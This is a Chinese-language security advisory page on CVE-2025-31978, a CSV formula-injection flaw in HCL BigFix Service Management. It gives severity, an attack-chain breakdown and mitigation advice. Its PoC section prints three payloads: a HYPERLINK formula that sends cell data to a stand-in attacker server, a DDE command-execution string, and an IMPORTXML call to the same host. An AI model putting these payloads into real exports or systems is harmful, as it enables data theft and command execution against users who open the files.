CVE-2025-31978 CVSS 4.6 中危

CVE-2025-31978 HCL BigFix Service Management CSV注入漏洞

披露日期: 2026-05-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-31978

漏洞类型

CSV注入

CVSS评分

4.6 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

HCL BigFix Service Management

漏洞概述

HCL BigFix Service Management在处理电子表格文件时未能充分清洗用户输入。攻击者可构造包含恶意公式的数据字段，当导出为CSV文件并被用户打开时，可能触发信息窃取或其他恶意行为。

技术细节

该漏洞属于CSV注入（Formula Injection）漏洞。由于HCL BigFix SM未对用户输入的数据进行有效的安全过滤，攻击者可以在表单字段中插入以特殊字符（如=、+、-、@）开头的Excel公式。当系统将这些数据导出为CSV格式文件时，恶意载荷会被保留。一旦受害者使用Microsoft Excel等电子表格软件打开该文件，且忽略安全警告，软件会自动解析并执行其中的公式。这可能导致本地文件被读取、敏感信息通过HTTP请求发送给攻击者，或者执行系统命令。

攻击链分析

STEP 1

1. 恶意输入

攻击者在HCL BigFix Service Management的输入字段中注入包含恶意Excel公式的数据（如=HYPERLINK或=CMD）。

STEP 2

2. 数据导出

系统将包含恶意数据的内容导出为CSV或XLS文件，且未对公式字符进行转义处理。

STEP 3

3. 文件分发

攻击者诱导具有权限的用户（如管理员）下载并使用电子表格软件（如Excel）打开该导出文件。

STEP 4

4. 代码执行

用户打开文件时，电子表格软件解析公式。如果用户忽略安全警告，恶意公式将执行，导致信息泄露或系统操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CSV Injection in HCL BigFix SM
# Inject the following payload into a vulnerable input field (e.g., username, ticket description)

# Payload 1: Information Exfiltration (Exfiltrates cell A1 content)
payload_info = "=HYPERLINK(\"http://attacker-server.com/steal.php?data=\"&A1,\"Click Here\")"

# Payload 2: OS Command Execution (Legacy Excel, DDE)
payload_cmd = "=cmd|' /C calc'!A0"

# Payload 3: Importing remote data
payload_import = "=IMPORTXML(\"http://attacker-server.com/malicious.xml\", \"//item\")"

# Explanation:
# When the application exports this data to a CSV file and a user opens it in Excel,
# Excel interprets the string starting with '=' as a formula.
# If the user accepts the security prompt, the formula executes.

影响范围

未在提供信息中明确指定（请参考HCL官方公告KB0128144）

防御指南

临时缓解措施

建议用户在打开来自HCL BigFix SM导出的CSV文件时保持警惕，不要启用Excel的自动内容或忽略安全警告。管理员应尽快联系供应商获取并安装修复补丁。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表